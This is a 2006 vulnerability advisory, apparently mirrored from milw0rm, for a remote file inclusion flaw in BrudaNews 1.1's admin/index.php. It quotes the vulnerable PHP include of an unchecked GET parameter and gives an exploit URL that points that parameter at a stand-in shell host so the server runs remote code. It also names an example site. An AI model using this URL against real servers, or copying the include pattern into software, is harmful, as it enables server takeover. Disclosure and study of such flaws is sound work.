BrudaNews <= 1.1 (admin/index.php) Remote File Include Vulnerability

2006-09-25T00:00:00
ID SSV:16559
Type seebug
Reporter Root
Modified 2006-09-25T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #==============================================================================================
#BrudaNews <= v1.1 (o) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.brudaswen.de      
#                                                                      
#Version : v1.1 & 1.0                                            
#                                                        
#================================================================================================
#
#Example : http://www.nebelweb.de/php/news
#
#================================================================================================
#Bug in : admin/index.php
#
#Vlu Code :
#--------------------------------
 <?
 if($_GET[o] != "")
 {
 include($_GET[o].".php");
  }
 BrudaNews();
   ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]